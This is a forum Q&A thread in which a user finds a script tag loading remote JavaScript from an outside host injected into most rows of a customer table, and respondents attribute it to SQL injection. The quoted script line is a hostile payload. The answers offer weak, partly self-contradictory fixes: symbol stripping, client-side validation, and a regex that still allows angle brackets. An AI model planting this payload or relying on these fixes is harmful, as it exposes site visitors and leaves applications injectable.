We help IT Professionals succeed at work.

possible attack on my SQL server 2005 DB?

newbie27
newbie27 asked
on
Hello Experts,
I have found a strange block of javascript got apended to one of the customers table field in my database .
The jscript looks something like this
<SCRIPT SRC=HTTP://2677.IN/YAHOO.JS></SCRIPT>
And I found this in almost every row of 1123200 records in the table.
I dont understand how this got added but this seems to have happend only today.
Please can someone advise if this make sense? Is this possible to someone update the database field which I have saved and secured on my dedicate server hosting.
Your help would greatly be appreciated.
Thanks
Sam
Comment
Watch Question

Top Expert 2015

Commented:
Sounds like a SQL injection attack. Are you using form fields or URL parameters on the site?

Author

Commented:
Yes I  have got the registration pages where I accept data from the customers using form fields...

How can I stop happening again please advise.

Thanks
Top Expert 2015
Commented:
You need to remove all symbols and entities from the text submitted before processing to prevent scripts from being accepted. Don't allow symbols like &, <, >, #, |, %, etc. to make it past the first sub during postback.
Top Expert 2015

Commented:
...or validate the form data on the client end and prevent symbols from being entered in the first place.
hi,
try something like this on the client end to make sure you only accept the valid characters depends on your need ofcourse

<asp:RegularExpressionValidator ID="RegularExpressionValidator8" runat="server"     
                                                                                 ErrorMessage="" display="Dynamic" Text="<br/>Invalid character entered"                                                                              ControlToValidate="txtUserName"                                                                                     
                                                                               ValidationExpression="^[ \r\na-zA-Z1-9@~#;.!)(:,£$%^&*''_+={\[}\]?/\\><|\-&quot;]*$"/>

Open in new window